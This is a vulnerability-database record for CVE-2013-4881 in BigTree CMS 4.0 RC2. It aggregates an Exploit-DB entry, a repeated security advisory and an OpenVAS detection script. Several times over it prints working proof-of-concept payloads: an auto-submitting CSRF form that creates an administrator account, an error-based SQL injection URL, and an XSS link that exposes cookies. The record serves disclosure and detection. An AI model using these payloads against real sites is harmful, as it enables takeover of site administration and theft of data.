ID CVE-2013-4881 Type cve Reporter cve@mitre.org Modified 2017-08-29T01:33:00
Description
Cross-site request forgery (CSRF) vulnerability in core/admin/modules/users/create.php in BigTree CMS 4.0 RC2 and earlier allows remote attackers to hijack the authentication of administrators for requests that create an administrative user via an add user action to index.php.
{"exploitdb": [{"lastseen": "2016-02-04T08:39:03", "bulletinFamily": "exploit", "description": "BigTree CMS Cross Site Request Forgery Vulnerability. CVE-2013-4881. Webapps exploit for php platform", "modified": "2013-07-17T00:00:00", "published": "2013-07-17T00:00:00", "id": "EDB-ID:38690", "href": "https://www.exploit-db.com/exploits/38690/", "type": "exploitdb", "title": "BigTree CMS Cross Site Request Forgery Vulnerability", "sourceData": "source: http://www.securityfocus.com/bid/61702/info\r\n\r\nBigTree CMS is prone to a cross-site request-forgery vulnerability.\r\n\r\nExploiting this issue may allow a remote attacker to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible.\r\n\r\nBigTree CMS 4.0 RC2 is vulnerable; other versions may also be affected. \r\n\r\n<form action=\"http://www.example.com/site/index.php/admin/users/create/\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"email\" value=\"user@email.com\">\r\n<input type=\"hidden\" name=\"password\" value=\"password\">\r\n<input type=\"hidden\" name=\"level\" value=\"1\">\r\n<input type=\"hidden\" name=\"name\" value=\"attacker\">\r\n<input type=\"hidden\" name=\"company\" value=\"company\">\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n<script>\r\ndocument.main.submit();\r\n</script>\r\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/38690/"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:48", "bulletinFamily": "software", "description": "\r\n\r\nAdvisory ID: HTB23165\r\nProduct: BigTree CMS\r\nVendor: BigTree CMS\r\nVulnerable Version(s): 4.0 RC2 and probably prior\r\nTested Version: 4.0 RC2\r\nVendor Notification: July 17, 2013 \r\nVendor Patch: July 17, 2013 \r\nPublic Disclosure: August 7, 2013 \r\nVulnerability Type: SQL Injection [CWE-89], Cross-Site Scripting [CWE-79], Cross-Site Request Forgery [CWE-352]\r\nCVE References: CVE-2013-4879, CVE-2013-4880\r\nRisk Level: High \r\nCVSSv2 Base Scores: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P), 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered multiple vulnerabilities in BigTree CMS, which can be exploited to perform SQL injection, Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF) attacks. A remote attacker can add, modify or delete information in application's database and gain complete control over the application.\r\n\r\n\r\n1) SQL Injection in BigTree CMS: CVE-2013-4879\r\n\r\nThe vulnerability exists due to insufficient sanitisation of user-supplied data passed to "/site/index.php" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database.\r\n\r\nThe following PoC (Proof of Concept) code displays version of MySQL server:\r\n\r\nhttp://[host]/site/index.php/%27and%28select%201%20from%28select%20count%28*%29%2cconcat%28%28select%20concat%28version%28%29%29%29%2cfloor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29and%27\r\n\r\n\r\n2) \u0421ross-Site Request Forgery (CSRF) in BigTree CMS: CVE-2013-4881\r\n\r\nThe vulnerability exists due to insufficient validation of the HTTP request origin. A remote attacker can create a malicious web page with CSRF exploit, trick a logged-in administrator into opening that page and create a new user with administrative privileges.\r\n\r\nThe basic CSRF exploit below will create a new administrator "attacker" with password "password":\r\n\r\n\r\n<form action="http://[host]/site/index.php/admin/users/create/" method="post" name="main">\r\n<input type="hidden" name="email" value="user@email.com">\r\n<input type="hidden" name="password" value="password">\r\n<input type="hidden" name="level" value="1">\r\n<input type="hidden" name="name" value="attacker">\r\n<input type="hidden" name="company" value="company">\r\n<input type="submit" id="btn">\r\n</form>\r\n<script>\r\ndocument.main.submit();\r\n</script>\r\n\r\n\r\n\r\n3) Cross-Site Scripting (XSS) in BigTree CMS: CVE-2013-4880\r\n\r\nThe vulnerability exists due to insufficient filtration of user-supplied data in "module" HTTP GET parameter passed to "/site/index.php/admin/developer/modules/views/add/" URL. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.\r\n\r\nThe exploitation example below uses the "alert()" JavaScript function to display administrator's cookies:\r\n\r\nhttp://[host]/site/index.php/admin/developer/modules/views/add/?module=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E&table=1&title=dolfbnwl\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nReplace the following files with their updated versions from GitHub:\r\ncore/inc/bigtree/cms.php\r\ncore/admin/modules/users/create.php\r\ncore/admin/modules/developer/modules/views/add.php\r\n\r\nMore Information:\r\nhttps://github.com/bigtreecms/BigTree-CMS/commit/c5f27bf66a7f35bd3daeb5f693f3e2493f51b1f3\r\nhttps://github.com/bigtreecms/BigTree-CMS/commit/4b0faa90fa8b9e1776c86db716894dcd7e6b4834\r\nhttps://github.com/bigtreecms/BigTree-CMS/commit/8a59c2e13f8e151b6a9e98f73e641e1ec8d928df\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23165 - https://www.htbridge.com/advisory/HTB23165 - Multiple Vulnerabilities in BigTree CMS.\r\n[2] BigTree CMS - http://www.bigtreecms.org/ - BigTree CMS is an open source content management system built on PHP and MySQL.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.\r\n\r\n", "modified": "2013-09-09T00:00:00", "published": "2013-09-09T00:00:00", "id": "SECURITYVULNS:DOC:29773", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29773", "title": "Multiple Vulnerabilities in BigTree CMS", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:16:57", "bulletinFamily": "exploit", "description": "", "modified": "2013-08-08T00:00:00", "published": "2013-08-08T00:00:00", "href": "https://packetstormsecurity.com/files/122736/BigTree-CMS-4.0-RC2-XSS-CSRF-SQL-Injection.html", "id": "PACKETSTORM:122736", "type": "packetstorm", "title": "BigTree CMS 4.0 RC2 XSS / CSRF / SQL Injection", "sourceData": "`Advisory ID: HTB23165 \nProduct: BigTree CMS \nVendor: BigTree CMS \nVulnerable Version(s): 4.0 RC2 and probably prior \nTested Version: 4.0 RC2 \nVendor Notification: July 17, 2013 \nVendor Patch: July 17, 2013 \nPublic Disclosure: August 7, 2013 \nVulnerability Type: SQL Injection [CWE-89], Cross-Site Scripting [CWE-79], Cross-Site Request Forgery [CWE-352] \nCVE References: CVE-2013-4879, CVE-2013-4880 \nRisk Level: High \nCVSSv2 Base Scores: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P), 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N) \nSolution Status: Fixed by Vendor \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n \n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge Security Research Lab discovered multiple vulnerabilities in BigTree CMS, which can be exploited to perform SQL injection, Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF) attacks. A remote attacker can add, modify or delete information in application's database and gain complete control over the application. \n \n \n1) SQL Injection in BigTree CMS: CVE-2013-4879 \n \nThe vulnerability exists due to insufficient sanitisation of user-supplied data passed to \"/site/index.php\" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database. \n \nThe following PoC (Proof of Concept) code displays version of MySQL server: \n \nhttp://[host]/site/index.php/%27and%28select%201%20from%28select%20count%28*%29%2cconcat%28%28select%20concat%28version%28%29%29%29%2cfloor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29and%27 \n \n \n2) \u0421ross-Site Request Forgery (CSRF) in BigTree CMS: CVE-2013-4881 \n \nThe vulnerability exists due to insufficient validation of the HTTP request origin. A remote attacker can create a malicious web page with CSRF exploit, trick a logged-in administrator into opening that page and create a new user with administrative privileges. \n \nThe basic CSRF exploit below will create a new administrator \"attacker\" with password \"password\": \n \n \n<form action=\"http://[host]/site/index.php/admin/users/create/\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"email\" value=\"user@email.com\"> \n<input type=\"hidden\" name=\"password\" value=\"password\"> \n<input type=\"hidden\" name=\"level\" value=\"1\"> \n<input type=\"hidden\" name=\"name\" value=\"attacker\"> \n<input type=\"hidden\" name=\"company\" value=\"company\"> \n<input type=\"submit\" id=\"btn\"> \n</form> \n<script> \ndocument.main.submit(); \n</script> \n \n \n \n3) Cross-Site Scripting (XSS) in BigTree CMS: CVE-2013-4880 \n \nThe vulnerability exists due to insufficient filtration of user-supplied data in \"module\" HTTP GET parameter passed to \"/site/index.php/admin/developer/modules/views/add/\" URL. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. \n \nThe exploitation example below uses the \"alert()\" JavaScript function to display administrator's cookies: \n \nhttp://[host]/site/index.php/admin/developer/modules/views/add/?module=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E&table=1&title=dolfbnwl \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nReplace the following files with their updated versions from GitHub: \ncore/inc/bigtree/cms.php \ncore/admin/modules/users/create.php \ncore/admin/modules/developer/modules/views/add.php \n \nMore Information: \nhttps://github.com/bigtreecms/BigTree-CMS/commit/c5f27bf66a7f35bd3daeb5f693f3e2493f51b1f3 \nhttps://github.com/bigtreecms/BigTree-CMS/commit/4b0faa90fa8b9e1776c86db716894dcd7e6b4834 \nhttps://github.com/bigtreecms/BigTree-CMS/commit/8a59c2e13f8e151b6a9e98f73e641e1ec8d928df \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23165 - https://www.htbridge.com/advisory/HTB23165 - Multiple Vulnerabilities in BigTree CMS. \n[2] BigTree CMS - http://www.bigtreecms.org/ - BigTree CMS is an open source content management system built on PHP and MySQL. \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/122736/bigtreecms-sqlxssxsrf.txt"}], "htbridge": [{"lastseen": "2017-06-23T23:08:25", "bulletinFamily": "software", "description": "High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in BigTree CMS, which can be exploited to perform SQL injection, Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF) attacks. A remote attacker can add, modify or delete information in application's database and gain complete control over the application. \n \n1) SQL Injection in BigTree CMS: CVE-2013-4879 \nThe vulnerability exists due to insufficient sanitisation of user-supplied data passed to \"/site/index.php\" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database. \nThe following PoC (Proof of Concept) code displays version of MySQL server: \nhttp://[host]/site/index.php/%27and%28select%201%20from%28select%20count%28* %29%2cconcat%28%28select%20concat%28version%28%29%29%29%2cfloor%28rand%280%2 9*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29and%27 \nSQL injection vulnerability was independently discovered by the Vendor just before High-Tech Bridge Security Research Lab. \n \n2) \u0421ross-Site Request Forgery (CSRF) in BigTree CMS: CVE-2013-4881 \nThe vulnerability exists due to insufficient validation of the HTTP request origin. A remote attacker can create a malicious web page with CSRF exploit, trick a logged-in administrator into opening that page and create a new user with administrative privileges. \nThe basic CSRF exploit below will create a new administrator \"attacker\" with password \"password\": \n<form action=\"http://[host]/site/index.php/admin/users/create/\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"email\" value=\"user@email.com\"> \n<input type=\"hidden\" name=\"password\" value=\"password\"> \n<input type=\"hidden\" name=\"level\" value=\"1\"> \n<input type=\"hidden\" name=\"name\" value=\"attacker\"> \n<input type=\"hidden\" name=\"company\" value=\"company\"> \n<input type=\"submit\" id=\"btn\"> \n</form> \n<script> \ndocument.main.submit(); \n</script> \n \n3) Cross-Site Scripting (XSS) in BigTree CMS: CVE-2013-4880 \nThe vulnerability exists due to insufficient filtration of user-supplied data in \"module\" HTTP GET parameter passed to \"/site/index.php/admin/developer/modules/views/add/\" URL. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. \nThe exploitation example below uses the \"alert()\" JavaScript function to display administrator's cookies: \nhttp://[host]/site/index.php/admin/developer/modules/views/add/?module=%22%3 E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E&table=1&title=dolfbnwl\n", "modified": "2013-07-17T00:00:00", "published": "2013-07-17T00:00:00", "id": "HTB23165", "href": "https://www.htbridge.com/advisory/HTB23165", "type": "htbridge", "title": "Multiple Vulnerabilities in BigTree CMS", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P/"}}], "openvas": [{"lastseen": "2019-05-29T18:38:17", "bulletinFamily": "scanner", "description": "This host is installed with BigTree CMS and is prone to multiple\n vulnerabilities", "modified": "2018-10-12T00:00:00", "published": "2013-08-19T00:00:00", "id": "OPENVAS:1361412562310803869", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803869", "title": "BigTree CMS Multiple Vulnerabilities", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_bigtree_cms_mult_vuln.nasl 11865 2018-10-12 10:03:43Z cfischer $\n#\n# BigTree CMS Multiple Vulnerabilities\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:bigtree:bigtree';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803869\");\n script_version(\"$Revision: 11865 $\");\n script_cve_id(\"CVE-2013-4879\", \"CVE-2013-4880\", \"CVE-2013-5313\", \"CVE-2013-4881\");\n script_bugtraq_id(61699, 61701, 61839, 61702);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 12:03:43 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-08-19 12:51:13 +0530 (Mon, 19 Aug 2013)\");\n script_name(\"BigTree CMS Multiple Vulnerabilities\");\n\n script_tag(name:\"summary\", value:\"This host is installed with BigTree CMS and is prone to multiple\n vulnerabilities\");\n script_tag(name:\"vuldetect\", value:\"Send a crafted HTTP GET request and check whether it is able to read the\n database version or not.\");\n script_tag(name:\"solution\", value:\"Upgrade to version 4.0 or later.\");\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - Improper sanitation of user-supplied input passed via the\n URL to the site/index.php script and 'module' parameter upon submission\n to '/admin/developer/modules/views/add/index.php' script\n\n - Cross-site request forgery (CSRF) vulnerability in\n core/admin/modules/users/create.php and core/admin/modules/users/update.php\");\n script_tag(name:\"affected\", value:\"BigTree CMS version 4.0 RC2 and prior\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to insert arbitrary HTML\n or script code, which will be executed in a user's browser session in the\n context of an affected site, hijack user session or manipulate SQL queries\n by injecting arbitrary SQL code.\");\n\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/86287\");\n script_xref(name:\"URL\", value:\"https://www.htbridge.com/advisory/HTB23165\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_bigtree_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"BigTree/Installed\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_app\");\n script_xref(name:\"URL\", value:\"http://www.bigtreecms.org\");\n exit(0);\n}\n\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! dir = get_app_location( port:port, cpe:CPE ) ) exit( 0 );\n\nif(dir == \"/\") dir = \"\";\n\nurl = dir + \"/site/index.php/%27and%28select%201%20from%28select%20\"+\n \"count%28*%29%2cconcat%28%28select%20concat%28version%2\"+\n \"8%29%29%29%2cfloor%28rand%280%29*2%29%29x%20from%20inf\"+\n \"ormation_schema.tables%20group%20by%20x%29a%29and%27\";\n\nif(http_vuln_check(port:port, url:url, check_header:TRUE,\n pattern:\"<b>Fatal error</b>: Uncaught exception.*invalid sqlquery\\(\\).*Duplicate entry .([0-9.]+)\"))\n{\n report = report_vuln_url( port:port, url:url );\n security_message(port:port,data:report);\n exit(0);\n}\n\nexit(99);\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
